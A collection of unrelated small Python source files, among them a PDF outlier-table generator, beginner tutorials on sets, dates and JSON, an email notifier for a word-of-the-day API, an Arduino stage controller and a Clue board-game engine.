        below_text=f'''This table shows the largest outliers for {col}.''',
        output=False
    )
    selected_df_tables = []
    processed_rows = 0
    # Paginate the surrounding-observation table, keep_num_rows at a time.
    while processed_rows < len(selected_orig_df):
        selected_df_table = _firm_list_table_from_df(
            selected_orig_df.iloc[processed_rows:processed_rows + keep_num_rows],
            col,
            keep_num_rows=keep_num_rows,
            caption=f'Outlier Firm Series for {col}',
            below_text=f'''This table shows observations leading up to, including, and after outliers for {col}.''',
            output=False
        )
        selected_df_tables.append(selected_df_table)
        processed_rows += keep_num_rows
    # BUG FIX: the original string lacked the f-prefix, so titles and PDF
    # file names read literally "Outlier Summary for {col}".
    full_title = f'Outlier Summary for {col}'
    document = Document.from_ambiguous_collection(
        [bad_table] + selected_df_tables,
        title=full_title,
        author=author
    )
    if output:
        assert outdir is not None
        document.to_pdf_and_move(
            outdir,
            outname=full_title,
            as_document=True
        )
    if as_document:
        return document
    else:
        return [bad_table] + selected_df_tables
def _firm_list_table_from_df(df: pd.DataFrame, col: str,
                             keep_num_rows: int =40, caption: str =None,
                             below_text: str =None, output: bool =False,
                             outdir: str =None) -> lt.Table:
    """Render the first keep_num_rows rows of df as a landscape LaTeX table.

    Numeric values are formatted via format_numbers_to_decimal_places;
    the first two columns are left-aligned, the rest centered. When
    `output` is True the table is also written to `outdir` as a PDF
    named after the caption.
    """
    if caption is None:
        caption =f'Largest Outliers for {col}'
    if below_text is None:
        below_text = f'''
    This table shows the largest outliers for {col}.
    '''
    formatted_df = df.iloc[:keep_num_rows].applymap(format_numbers_to_decimal_places)
    align_str = 'll' + 'c' * (len(formatted_df.columns) - 2)
    table = lt.Table.from_list_of_lists_of_dfs(
        [[formatted_df]],
        caption=caption,
        below_text=below_text,
        align=align_str,
        landscape=True
    )
    if output:
        assert outdir is not None
        table.to_pdf_and_move(
            outdir,
            outname=caption
        )
    return table
f5e09d4520283c58490f0421fe3fda5d6450a091 | Python | eyelivermore/pythonlianxi | /py/集合数据结构.py | UTF-8 | 1,246 | 4.8125 | 5 | [] | no_license |
'''
A set is an unordered collection with no duplicate elements. Basic uses
include membership testing and eliminating duplicate entries.
'''
basket = {'apple', 'orange', 'apple', 'pear', 'orange', 'banana'}
# The (Chinese) note below explains: sets can be created with braces {},
# but an EMPTY set must be created with set() -- {} creates an empty dict.
"""
可以用大括号({})创建集合。
注意:如果要创建一个空集合,你必须用 set() 而不是 {} ;后者创建一个空的字典,下一节我们会介绍这个数据结构
"""
a = set()
# The following demonstrates operations on two sets.
a = set('abcd')
b = set('cdef')
print('a集合中的字母\n',a)
print('b集合中的字母\n',b)
print('a-b:集合a中包含,b中不包含,也叫集体的差集\n',a-b)  # difference
print('a|b:集合a或b中包含的所有元素,也叫集合的并集\n',a|b)  # union
print('a&b:集合a和b中都包含了的元素,也中集集合的交集\n',a&b)  # intersection
print('a^b:不同时包含于a和b的元素,也叫集合中的补集\n',a^b)  # symmetric difference
print('集合的增,删,改,查')
print('集合的增加用add(x)和update(x)函数')
a.add("f")  # add one element
print('a.add("f")',a)
print('删用remove(x)删除指定元素')
a.remove('f')  # remove raises KeyError if the element is absent
print('a.remove("f")',a)
print('集合中的元素不能修改')
print('判断元素 x 是否在集合 s 中,存在返回 True,不存在返回 False。')
print('"f" in a 判断f是否在a集合中',"f" in a)  # membership test
print("set")
aa401e50bdcae7188904e8c3f0d492c136984e44 | Python | google/earthengine-community | /samples/python/apidocs/ee_featurecollection_getnumber.py | UTF-8 | 993 | 2.578125 | 3 | [
"Apache-2.0",
"CC-BY-4.0"
] | permissive | # Copyright 2023 The Google Earth Engine Community Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START earthengine__apidocs__ee_featurecollection_getnumber]
# A FeatureCollection with a number property value.
# NOTE(review): assumes `ee` is imported and ee.Initialize() has been
# called by the surrounding sample harness.
fc = ee.FeatureCollection([]).set('number_property', 1.5)
# Fetch the number property value as an ee.Number object.
print('Number property value as ee.Number:',
      fc.getNumber('number_property').getInfo())
# [END earthengine__apidocs__ee_featurecollection_getnumber]
| true |
5fe47b6541bc1f32c8dba67ab90923ef7f70929a | Python | HigorSenna/python-study | /guppe/manipulando_arquivos_csv_e_json/json_com_pickle.py | UTF-8 | 885 | 3.625 | 4 | [] | no_license | """
Trabalhando com JSON + Pickle
pip install jsonpickle
"""
import json
import jsonpickle
class Cachorro:
    """Dog with a read-only name; used by the json/jsonpickle demos below."""

    def __init__(self, nome):
        # Name-mangled attribute (serialized via __dict__ as _Cachorro__nome);
        # exposed read-only through the `nome` property.
        self.__nome = nome

    @property
    def nome(self):
        """The dog's name (read-only)."""
        return self.__nome

    def latir(self):
        """Print a barking message."""
        print(f'{self.nome} está latindo')
cachorro = Cachorro('Pluto')
# Plain json can serialize builtin containers...
json_string = json.dumps(['produto', {'Playstation4': ('2TB', 'Novo', '220V')}])
print(json_string)
# ...and an object's __dict__ (note the name-mangled _Cachorro__nome key).
cachorro_json = json.dumps(cachorro.__dict__)
print(cachorro_json)
# JSON PICKLE: serializes the object itself, including its type.
ret = jsonpickle.encode(cachorro)
print(ret)
# Writing with jsonpickle (creates cachorro.json in the working directory)
with open('cachorro.json', 'w') as arquivo:
    ret = jsonpickle.encode(cachorro)
    arquivo.write(ret)
# Reading with jsonpickle: decode() reconstructs a Cachorro instance.
with open('cachorro.json', 'r') as arquivo:
    conteudo = arquivo.read()
    cachorro_by_json: Cachorro = jsonpickle.decode(conteudo)
    print(cachorro_by_json.nome)
2ff7a82c8c4df3ea13a7e464f4c7402f9424d7e2 | Python | angelicaba23/MisionTic2022 | /Python/area_triangulo.py | UTF-8 | 628 | 4.34375 | 4 | [] | no_license | """
------------MinTic-----------------
-------------UPB-------------------
-------Angélica Barranco-----------
"""
# Read the 3 sides of any triangle and compute its area using Heron's
# formula, where A, B, C are the sides and S the semi-perimeter.
import numpy as np
# Inputs
a = float(input("Digite el valor de a "))
b = float(input("Digite el valor de b "))
c = float(input("Digite el valor de c "))
# Processing: semi-perimeter, then area = sqrt(s(s-a)(s-b)(s-c))
s = (a +b + c) / 2
arg = s*(s-a)*(s-b)*(s-c)
# NOTE(review): if the sides cannot form a triangle, arg < 0 and np.sqrt
# yields nan (with a RuntimeWarning).
area = np.sqrt(arg)
# Output
print("El triangulo de lados a = ", a, ", b = ", b, " c = ", c, " tiene un semiperímetro = ", s, "y area = ", area)
| true |
010042edc151e9a39c8d92d08e1e785b04e69f9f | Python | entirelymagic/PrivatePython | /Learning/date_and_time.py | UTF-8 | 476 | 3.75 | 4 | [] | no_license | """
You have to allways point to a central reference
when you speak about the time.
"""
from datetime import datetime, timezone, timedelta
# Timezone-aware "now": carries an explicit UTC offset (the original
# comment claiming "no offset" was wrong).
print(datetime.now(timezone.utc))
today = datetime.now(timezone.utc)
tomorrow = today + timedelta(days=1)
print(today)
print(tomorrow)
# Format the aware datetime for display.
print(today.strftime('%d-%m-%Y %H:%M:%S'))
# BUG FIX: prompt previously said "YYYY--mm-dd" (double dash) while the
# strptime format below expects single dashes.
user_date = input('Enter the date in YYYY-mm-dd format:')
user_date = datetime.strptime(user_date, '%Y-%m-%d')
print(user_date)
| true |
f5fb5489eb2fb4e22cb21eaf7f1cf6fb94bbd911 | Python | Dhual-Yhn/setp02 | /cachipun.py | UTF-8 | 1,737 | 3.78125 | 4 | [] | no_license | # Set de problemas #2
# Problema 5.
# Lenguaje y Tecnicas de Programacion
# Profesor: Igor Caracci
# Profesor(Ayudante): Andres Caro
# Universidad de Santiago de Chile
# 07 de mayo del 2013
#
# Descripcion:
#
# Programa del juego clasico "cachipun"
def ganador_cachipun(lista):
    """Print the winner of a two-player rock-paper-scissors round.

    *lista* holds two [name, move] pairs, move being 'R' (piedra),
    'P' (papel) or 'T' (tijera). On a tie the original behaviour is kept:
    player 0 is announced. Raises Exception when the player count is not
    exactly 2 or when either move is invalid.
    """
    # Exactly two players are required.
    if len(lista) != 2:
        raise Exception("Numero incorrecto de jugadores")
    # BUG FIX: validate BOTH players' moves — the original only checked
    # player 0, so an invalid move by player 1 silently produced a bogus
    # "winner" instead of an error.
    for jugador in lista:
        if jugador[1] not in ('R', 'P', 'T'):
            raise Exception("Jugada no valida")
    j0 = lista[0][1]
    j1 = lista[1][1]
    # beats[x] is the move that x defeats: paper covers rock, rock crushes
    # scissors, scissors cut paper.
    beats = {'P': 'R', 'R': 'T', 'T': 'P'}
    if j0 == j1 or beats[j0] == j1:
        ganador = lista[0]
    else:
        ganador = lista[1]
    print( "Ganador : ", ganador[0], " Jugada: ", ganador[1] )
    return
# Interactive entry point: collect (name, move) pairs until the sentinel
# name '0' is typed, then hand the whole list to ganador_cachipun.
# NOTE(review): ganador_cachipun raises unless exactly 2 players entered.
lista = []
while True:
    nombre = input('Ingrese nombre del jugador, 0 para terminar : ');
    if ( nombre == '0' ):
        break
    # Moves are normalised to upper case: R (piedra), P (papel), T (tijera).
    jugada = input('Ingrese jugada (R/T/P) :').upper();
    juego = []
    juego.append (nombre)
    juego.append (jugada)
    lista.append (juego)
ganador_cachipun(lista)
| true |
456231f45a34ed8e3c4bd4cca08f87d173c7e6dd | Python | bagua0301/red_slg | /OriginalPlan/trunk/client/doc/DataConvert/toServer/data_skill_point.py | UTF-8 | 2,266 | 2.515625 | 3 | [] | no_license | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
'''
技能点购买配置
@author: ZhaoMing
@deprecated: 2014-07-08
'''
import os
# 导入要用到的函数
from libs.utils import load_excel, load_sheel, module_header, module_php_header, gen_erl, gen_xml, prev, get_value,gen_php
# Load the skill workbook "skill.xlsx"; data files all live under docs/.
work_book = load_excel(ur"skill")
# The Erlang module header documents the generated file's purpose;
# -module(module_name) is appended automatically. module_header() hides a
# third author argument, so module_header(ur"...", module_name, "King")
# also works. append() here behaves like Erlang's ++, but on Python lists;
# the Erlang function comments are optional, yet recommended.
# Helper that turns a comma-separated spec string into integer attributes.
def enum(module, str_enum):
    """Attach auto-numbered integer attributes to *module*.

    The spec is a comma-separated list of names; an entry of the form
    "NAME=<alnum>" resets the running counter via eval() before assigning.
    """
    spec = str_enum.replace(" ", "").replace("\n", "")
    idx = 0
    for entry in spec.split(","):
        name = entry
        if '=' in entry:
            name, val = entry.rsplit('=', 1)
            # Only a purely alphanumeric value resets the counter.
            if val.isalnum():
                idx = eval(val)
        setattr(module, name.strip(), idx)
        idx += 1
## The field names below must appear in the same order as the Excel columns.
BaseColumn = """
nth ,gold
"""
class FieldClassBase:
    # Holder whose class attributes map column names to column indexes.
    def __init__(self):
        # Writes nth=0, gold=1 onto the class via the enum() helper.
        enum(FieldClassBase, BaseColumn)
# Field-index enum instance, built once at import time.
BaseField = FieldClassBase()
# De-duplicate a sequence while preserving first-seen order.
def unique_list(seq, excludes=()):
    """Return *seq*'s elements in order, dropping duplicates and anything
    listed in *excludes*.

    FIX: the default for *excludes* was a mutable list ([]); an empty
    tuple avoids the shared-mutable-default pitfall and is backward
    compatible for callers.
    """
    seen = set(excludes)  # every element already emitted or excluded
    return [x for x in seq if x not in seen and not seen.add(x)]
# Name of the generated Erlang module (data_skill_point.erl).
skill_erl = "data_skill_point"
# Header args: (description, module name, author, source xlsx, generator).
data_skill = module_header(ur"技能点购买配置", skill_erl, "lhh", "skill.xlsx", "data_skill_point.py")
data_skill.append("""
-include("skill.hrl").
-export([get/1]).
""")
stone_dict = {}  # NOTE(review): appears unused in this file — confirm.
skill_base = []
skill_base.append("%% @spec get(Times::int()) -> Cost::int().")
# For each row of the sheet, emit one Erlang clause get(Times) -> Cost;
# Times is shifted to be zero-based.
@load_sheel(work_book, ur"技能点购买")
def get_base_cost(content):
    times = int(content[BaseField.nth])-1
    cost = int(content[BaseField.gold])
    skill_base.append("""get({0}) -> {1}; """.format(times, cost))
    return []
get_base_cost()
# Catch-all clause for purchase counts not present in the sheet.
skill_base.append("get(_) -> 500.")
data_skill.extend(skill_base)
gen_erl(skill_erl, data_skill)
gen_erl(skill_erl, data_skill) | true |
710b05121ea3ec9b5caa5493ab5a7005f9fb1f07 | Python | mridubhatnagar/Word-Notifier | /build_vocabulary.py | UTF-8 | 2,855 | 2.828125 | 3 | [] | no_license | import os
import requests
import json
import datetime
import smtplib
import logging
from email.mime.text import MIMEText
logging.basicConfig(level=logging.DEBUG)
def fetch_response(url=None):
    """GET the word-of-the-day endpoint at *url* and forward the UTF-8
    decoded JSON body to parse_response()."""
    response = requests.get(url)
    decoded = response.content.decode("utf-8")
    logging.info("JSON response is fetched")
    parse_response(decoded)
def parse_response(response):
    """Decode the wordnik JSON payload, pull out the fields of interest
    and forward them to format_response()."""
    payload = json.loads(response)
    word_of_the_day = payload["word"]
    origin = payload["note"]
    date = payload["publishDate"]
    usage = payload["examples"][0]["text"]
    first_definition = payload["definitions"][0]
    meaning = first_definition["text"]
    part_of_speech = first_definition["partOfSpeech"]
    source = first_definition["source"]
    logging.info("Parsed JSON response")
    format_response(word_of_the_day, origin, date, usage, meaning, part_of_speech, source)
def format_response(word_of_the_day, origin, date, usage, meaning, part_of_speech, source):
    """Bundle the extracted fields into one dict and trigger the e-mail
    notification with it."""
    payload = {
        "wordOfTheDay": word_of_the_day,
        "origin": origin,
        "date": date,
        "usage": usage,
        "meaning": meaning,
        "part_of_speech": part_of_speech,
        "source": source,
    }
    email_notification(payload)
def email_notification(message):
    """E-mail the word-of-the-day payload to the configured recipient.

    Credentials and recipient come from the MAIL_ACCOUNT, MAIL_PASSWORD
    and MAILTO environment variables; the dict *message* is sent as
    pretty-printed JSON via Gmail's SMTP server.
    """
    smtp_server = smtplib.SMTP('smtp.gmail.com', 587)
    smtp_account = os.environ.get('MAIL_ACCOUNT')
    smtp_password = os.environ.get('MAIL_PASSWORD')
    mailto = os.environ.get('MAILTO')
    msg = json.dumps(message, indent=4)
    smtp_server.ehlo()
    smtp_server.starttls()
    try:
        smtp_server.login(smtp_account, smtp_password)
    except smtplib.SMTPAuthenticationError:
        logging.error('Could not login to the smtp server please check your username and password')
        # BUG FIX: the original called sys.exit(1) but `sys` is never
        # imported in this module, so the handler raised NameError instead
        # of exiting. SystemExit(1) needs no import and exits cleanly.
        raise SystemExit(1)
    msg = MIMEText(msg)
    msg['Subject'] = 'Word Of The Day!'
    msg['From'] = smtp_account
    msg['To'] = mailto
    smtp_server.send_message(msg)
    logging.info("Email notification sent!")
    smtp_server.quit()
# Entry point: build today's wordOfTheDay URL (API key from $API_KEY) and
# kick off the fetch -> parse -> format -> e-mail pipeline.
api_key = os.environ.get('API_KEY')
date = datetime.datetime.today().strftime('%Y-%m-%d')
url = 'http://api.wordnik.com:80/v4/words.json/wordOfTheDay?'+ 'date='+date+'&'+'api_key='+api_key
fetch_response(url)
| true |
8b69df9a732b92ac447a20b361123acb83ce0e43 | Python | Tekken-New-Blood/cleanup_set_your_roles | /cleanup_roles.py | UTF-8 | 1,572 | 2.578125 | 3 | [] | no_license | import discord
# Discord client plus the guild-specific constants the bot relies on.
client = discord.Client()
yyaen_id = 95485950833983488  # author whose messages are never deleted
shreeder_id = 161215065926795265  # user greeted with "gn Shreeder"
set_your_roles_channel_id = 492305188829265941  # only channel $cleanup may purge
wrong_channel_msg = "This isn't #set_your_roles"
@client.event
async def on_ready():
    # Fired once the session is established; log which account we run as.
    print('We have logged in as {0.user}'.format(client))
@client.event
async def on_message(message):
    """Dispatch chat commands: a greeting easter egg, $testcleanup
    (dry run, any channel) and $cleanup (restricted to #set_your_roles)."""
    # Ignore our own messages so the bot cannot react to itself.
    if message.author == client.user:
        return
    if message.author.id == shreeder_id:
        # Night Shreeder
        if "night" in message.content.lower():
            await message.channel.send("gn Shreeder")
    # Dry run: print what would be deleted without touching anything.
    if message.content.startswith('$testcleanup'):
        print("Test command called")
        print(message.channel.id)
        await _cleanup_channel(message.channel, True)
    # Real cleanup; '$testcleanup' does not start with '$cleanup', so the
    # two branches never both fire for one message.
    if message.content.startswith('$cleanup'):
        print(message.channel.id)
        if message.channel.id == set_your_roles_channel_id:
            await _cleanup_channel(message.channel, False)
        else:
            await message.channel.send(wrong_channel_msg)
            print(wrong_channel_msg)
async def _cleanup_channel(channel, dryrun):
    """Walk the channel history; delete (or, when *dryrun*, just print)
    every message not authored by the protected user (yyaen_id)."""
    async for elem in channel.history():
        if elem.author.id != yyaen_id:
            try:
                if dryrun:
                    print("{} :: {}".format(elem.author, elem.content))
                else:
                    await elem.delete()
            except Exception as e:
                # Best effort: report and keep going (e.g. missing perms).
                print("Failed to delete msg :: {}".format(e))
def get_credentials():
    """Return the bot token: the first line of config.txt.

    BUG FIX: readline() keeps the trailing newline, which corrupts the
    token handed to client.run(); surrounding whitespace is now stripped.
    """
    with open("config.txt") as f:
        return f.readline().strip()
client.run(get_credentials()) | true |
b7619583381bdf79ad56de57e3c5f0c353c88c44 | Python | Indhuu/git-github | /python/10pwdfor.py | UTF-8 | 330 | 3.296875 | 3 | [] | no_license | # 10 attempt password for loop
# Password prompt allowing up to 5 attempts.
# BUG FIX: the original broke out of the loop in BOTH branches, so only a
# single attempt was ever possible, and the "attempts over" message was
# printed even after a correct password.
for attempt in range(5):
    password = input('Enter the password : ')
    if password == 'charu':
        print ('correct password')
        break
else:
    # for/else: runs only when the loop finished without break,
    # i.e. all 5 attempts were wrong.
    print ('5 attemps over. 5 more left')
| true |
197adf7f6577499c43d119f127ada8613ef050ba | Python | prachi464/Python-assignment | /PYTHONTRAINNING/module5/indian_batsman.py | UTF-8 | 1,698 | 2.90625 | 3 | [] | no_license | Info={1:{'player_type':'Batsman','player_name':'virat_kohli','matches':'200','runs':'15000','average':'12','Highest_score':'200'}
,2:{'player_type':'Batsman','player_name':'Rohit_Sharma','matches':'250','runs':'20000','average':'20','Highest_score':'250'}
,3:{'player_type':'Bowler','player_name':'Jasmeet_bumrah','matches':'100','runs':'200','average':'10','Highest_score':'80'}
,4:{'player_type':'Allrounder','player_name':'ravindra_jadeja','matches':'100','runs':'1500','average':'8','Highest_score':'100'}
,5:{'player_type':'Bowler','player_name':'Mohammad_shami','matches':'300','runs':'500','average':'15','Highest_score':'70'}}
print(Info)
print("\n")

# Walk the flat {id: stats} layout and print every field as "key: value".
for p_id, p_info in Info.items():
    print("\n player", p_id)
    for key in p_info:
        # FIX: removed the original `if key == ['Highest_score']: print(key)`
        # branch — it compared a str key against a *list*, so it was
        # unreachable dead code.
        print(key + ':', p_info[key])
# Nested layout: the same squad grouped by role.
Info={'Batsman':{'virat_kohli':{'matches':'200','runs':'15000','average':'12','Highest_score':'200'},
'Rohit_Sharma':{'matches':'250','runs':'20000','average':'20','Highest_score':'250'}},
'Bowler':{'Jasmeet_bumrah':{'matches':'100','runs':'200','average':'10','Highest_score':'80'}},
'Allrounder':{'ravindra_jadeja':{'matches':'100','runs':'1500','average':'8','Highest_score':'100'}}}

# Print each role, each player's stats dict, then the individual items.
for role, players in Info.items():
    print("\n player", role)
    for player_name, stats in players.items():
        print(player_name, stats)
        for item in stats.items():
            print(item)

print(Info['Batsman']['virat_kohli']['runs'])

# BUG FIX: Highest_score values are *strings*; the original max(c) compared
# them lexicographically and reported '80'. Converting to int makes max()
# numeric, so the true maximum (250) is reported.
c = []
for role in Info.keys():
    for player_name in Info[role].keys():
        c.append(int(Info[role][player_name]['Highest_score']))
print("Highest score", max(c))
| true |
3c9c923f21e202ea5f9180b46361f70932f9e817 | Python | fairbank-lab-ba-tagging/cold-probe | /Arduino/arduino_gui_2.0/scripts/runExperiment_noAblation.py | UTF-8 | 1,926 | 3.203125 | 3 | [] | no_license | from pyfirmata import INPUT, OUTPUT
from time import sleep, time
def run(board):
    """One manual experiment cycle (no ablation): configure the pins,
    move the stage down then up on operator confirmation, and trigger a
    single camera exposure.

    *board* is expected to expose pyfirmata-style analog_pins/digital_pins.
    """
    analog_pins = board.analog_pins # Pins 0-5
    digital_pins = board.digital_pins # Pins 2-13
    # Stepper pins
    in_1 = digital_pins[2]  # start pulse (see send_up/send_down)
    in_2 = digital_pins[3]  # direction select
    stepper_out = digital_pins[4]  # stop feedback read by trigger()
    in_1.mode = OUTPUT
    in_2.mode = OUTPUT
    stepper_out.mode = INPUT
    # Laser pin
    laser_trigger = digital_pins[5]
    laser_trigger.mode = OUTPUT
    # Camera pin
    camera_trigger = digital_pins[6]
    camera_trigger.mode = OUTPUT
    # Prepare pins: drive every output idle-low before the sequence.
    in_1.write(0)
    in_2.write(0)
    laser_trigger.write(0)
    camera_trigger.write(0)
    print('Start')
    duh = input('Send Down? [Enter]')  # wait for operator confirmation
    send_down(in_1, in_2, stepper_out)
    duh = input('Send Up? [Enter]')
    send_up(in_1, in_2, stepper_out)
    # duh = input('Trigger Camera? [Enter]')
    ttl(camera_trigger)
    print('Picture Taken!')
# --- Helper functions used by the experiment sequence ---
def ttl(pin, duration=0.01):
    """Emit one TTL pulse on *pin*: drive high, hold *duration* s, drive low."""
    for level, hold in ((1, duration), (0, 0)):
        pin.write(level)
        if hold:
            sleep(hold)
def fire_laser(pin, pulses, frequency):
    """Send *pulses* TTL pulses on *pin*, spacing them at least
    1/frequency seconds apart by busy-waiting on the wall clock."""
    period = 1 / frequency
    fired = 0
    last_pulse = 0
    while fired < pulses:
        now = time()
        if now - last_pulse > period:
            ttl(pin, duration=0.01)
            last_pulse = now
            fired += 1
def trigger(trigger):
    """Block (polling every 1 ms) until *trigger*'s digital read is truthy."""
    # NOTE(review): the parameter shadows the function name; harmless here
    # since the body never needs to call trigger() recursively.
    while not trigger.read():
        sleep(0.001)
def send_up(start_pin, direction_pin, stop_trigger):
    """Raise the stage: direction high, one start pulse, then block until
    the stop input fires; the elapsed time is reported."""
    print('Moving up...')
    began = time()
    direction_pin.write(1)
    ttl(start_pin)
    trigger(stop_trigger)
    print('Move up complete! {:.4}s'.format(time() - began))
def send_down(start_pin, direction_pin, stop_trigger):
    """Lower the stage: direction low, one start pulse, then block until
    the stop input fires; the elapsed time is reported."""
    print('Moving down...')
    began = time()
    direction_pin.write(0)
    ttl(start_pin)
    trigger(stop_trigger)
    print('Move down complete! {:.4}s'.format(time() - began))
| true |
8bef1d4899d6b4485ed8f2f1888056e64475b07e | Python | lrothschildshea/RL-Clue-AI | /game.py | UTF-8 | 6,172 | 2.953125 | 3 | [] | no_license | from cards import Cards
from qLearnPlayer import Player as QPlayer
from deepQPlayer import Player as DeepQPlayer
from player import Player
import random, sys
class Game:
    """One game of Clue played by a mix of tabular-Q, deep-Q and baseline
    players. Call run_game() to play until someone guesses the solution,
    or until only one player is left standing."""
    # Class-level defaults for per-game state.
    currentPlayer = 0
    solution_guessed = False
    turn = 0
    # Static card categories; characters also name the players in seat order.
    rooms = ["Ballroom", "Billiard Room", "Conservatory", "Dining Room", "Hall", "Kitchen", "Library", "Lounge", "Study"]
    weapons = ["Candlestick", "Knife", "Lead Pipe", "Revolver", "Rope", "Wrench"]
    characters = ["Mr. Green", "Colonel Mustard", "Mrs. Peacock", "Professor Plum", "Ms. Scarlet", "Mrs. White"]

    def __init__(self, numberOfPlayers, deepQActionSet, qNetworks, qtbl={}, numQlearn=0, numDeepQ=0):
        """Deal the cards and build the roster: numQlearn tabular-Q players
        first, then numDeepQ deep-Q players, then baseline players for the
        remainder.

        NOTE(review): qtbl={} is a mutable default shared across Game
        instances, and self.numPlayers is never assigned when
        numberOfPlayers is outside 2..6 — confirm both upstream.
        """
        if numberOfPlayers > 1 and numberOfPlayers < 7:
            self.numPlayers = numberOfPlayers
        self.board = self.init_board()
        #door = (hall_loc, room_num, room_loc)
        self.doors = [((4, 6), 1, (3, 6)), ((4, 8), 2, (4, 9)), ((7, 11), 2, (6, 11)), ((7, 12), 2, (6, 12)), ((6, 17), 3, (5, 17)), ((8, 7), 4, (8, 6)), ((11, 3), 4, (10, 3)), ((8, 17), 5, (9, 17)), ((12, 15), 5, (12, 16)), ((11, 1), 6, (12, 1)), ((15, 6), 6, (15, 5)), ((19, 5), 7, (19, 4)), ((19, 7), 8, (19, 8)), ((16, 9), 8, (17, 9)), ((16, 14), 8, (17, 14)), ((19, 16), 8, (19, 15)), ((17, 19), 9, (18, 19))]
        self.cards, self.solution = Cards(self.numPlayers).deal_cards()
        self.players = []
        for i in range(numQlearn):
            self.players.append(QPlayer(self.characters[i], self.cards[i], qtbl))
        for i in range(numDeepQ):
            self.players.append(DeepQPlayer(self.characters[numQlearn+i], self.cards[numQlearn+i], self.board, deepQActionSet, qNetworks))
        for i in range(self.numPlayers - numQlearn - numDeepQ):
            self.players.append(Player(self.characters[numQlearn + numDeepQ + i], self.cards[numQlearn + numDeepQ + i]))

    def run_game(self):
        """Drive the turn loop until the solution is guessed or one player
        remains. Returns (players_left, winning_character, turn_count)."""
        #while game not over
        while not self.solution_guessed:
            self.turn += 1
            if(self.turn > 5000):
                #assume random players not making progress so end game by removing all but 1 players
                self.players = [self.players[0]]
                self.currentPlayer = 0
            if (self.turn % 10) == 0:
                print("Turn:", self.turn)
            # Last player standing wins by default.
            if len(self.players) == 1:
                print("Only one player left. Game Over!")
                print("Player ", self.players[self.currentPlayer].character, "has won!")
                print("Solution:", self.solution)
                self.solution_guessed = True
                return (len(self.players), self.players[self.currentPlayer].character, self.turn)
            # this is needed in stead of removing current from a copy of players because it maintains the correct order
            other_players = []
            for i in range(self.currentPlayer + 1, self.currentPlayer + self.numPlayers):
                i = i % self.numPlayers
                other_players.append(self.players[i])
            #make move
            move = self.players[self.currentPlayer].make_move(self.board, self.doors, self.roll_dice(), self.players[self.currentPlayer].location, other_players, self.solution)
            #if move was to guess solution then handle guess
            if move != None:
                if move == self.solution:
                    self.solution_guessed = True
                    print("Player ", self.players[self.currentPlayer].character, "has won!")
                    print("Solution:", move)
                    return (len(self.players), self.players[self.currentPlayer].character, self.turn)
                else:
                    # Wrong guess: the player is eliminated and their cards
                    # are revealed to everyone else.
                    print("Player ", self.players[self.currentPlayer].character, "has lost! (Player Type:" + self.players[self.currentPlayer].type + ")")
                    for i in other_players:
                        i.record_cards(self.players[self.currentPlayer].cards)
                    self.players.remove(self.players[self.currentPlayer])
                    self.currentPlayer -= 1
                    self.numPlayers -= 1
            self.currentPlayer = (self.currentPlayer + 1) % self.numPlayers

    def roll_dice(self):
        """Return a uniform six-sided die roll (1-6)."""
        return random.randint(1, 6)

    def init_board(self):
        """Build the 25-row board grid used for movement."""
        #-1 = no space 0 = hallway num=room
        board = [None]*25
        board[0] = [1,1,1,1,1,1,-1,0,-1,-1,-1,-1,-1,-1,-1,-1,0,-1,3,3,3,3,3,3]
        board[1] = [1,1,1,1,1,1,1,0,0,2,2,2,2,2,2,0,0,3,3,3,3,3,3,3]
        board[2] = [1,1,1,1,1,1,1,0,0,2,2,2,2,2,2,0,0,3,3,3,3,3,3,3]
        board[3] = [1,1,1,1,1,1,1,0,0,2,2,2,2,2,2,0,0,3,3,3,3,3,3,3]
        board[4] = [-1,0,0,0,0,0,0,0,0,2,2,2,2,2,2,0,0,3,3,3,3,3,3,3]
        board[5] = [0,0,0,0,0,0,0,0,0,2,2,2,2,2,2,0,0,3,3,3,3,3,3,3]
        board[6] = [-1,4,4,4,4,4,0,0,0,2,2,2,2,2,2,0,0,0,0,0,0,0,0,-1]
        board[7] = [4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
        board[8] = [4,4,4,4,4,4,4,0,0,-1,-1,-1,-1,-1,0,0,0,0,0,0,0,0,0,-1]
        board[9] = [4,4,4,4,4,4,4,0,0,-1,-1,-1,-1,-1,0,0,5,5,5,5,5,5,5,5]
        board[10] = [-1,4,4,4,4,4,0,0,0,-1,-1,-1,-1,-1,0,0,5,5,5,5,5,5,5,5]
        board[11] = [-1,0,0,0,0,0,0,0,0,-1,-1,-1,-1,-1,0,0,5,5,5,5,5,5,5,5]
        board[12] = [6,6,6,6,6,6,0,0,0,-1,-1,-1,-1,-1,0,0,5,5,5,5,5,5,5,5]
        board[13] = [6,6,6,6,6,6,0,0,0,-1,-1,-1,-1,-1,0,0,5,5,5,5,5,5,5,5]
        board[14] = [6,6,6,6,6,6,0,0,0,-1,-1,-1,-1,-1,0,0,5,5,5,5,5,5,5,5]
        board[15] = [6,6,6,6,6,6,0,0,0,0,0,0,0,0,0,0,0,0,0,5,5,5,5,5]
        board[16] = [6,6,6,6,6,6,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,-1]
        board[17] = [-1,0,0,0,0,0,0,0,8,8,8,8,8,8,8,8,0,0,0,0,0,0,0,0]
        board[18] = [0,0,0,0,0,0,0,0,8,8,8,8,8,8,8,8,0,0,9,9,9,9,9,-1]
        board[19] = [-1,7,7,7,7,0,0,0,8,8,8,8,8,8,8,8,0,0,9,9,9,9,9,9]
        board[20] = [7,7,7,7,7,7,0,0,8,8,8,8,8,8,8,8,0,0,9,9,9,9,9,9]
        board[21] = [7,7,7,7,7,7,0,0,8,8,8,8,8,8,8,8,0,0,9,9,9,9,9,9]
        board[22] = [7,7,7,7,7,7,0,0,8,8,8,8,8,8,8,8,0,0,9,9,9,9,9,9]
        board[23] = [7,7,7,7,7,7,-1,0,0,0,8,8,8,8,0,0,0,-1,9,9,9,9,9,9]
        board[24] = [-1,-1,-1,-1,-1,-1,-1,-1,-1,0,-1,-1,-1,-1,0,-1,-1,-1,-1,-1,-1,-1,-1,-1]
        return board
| true |
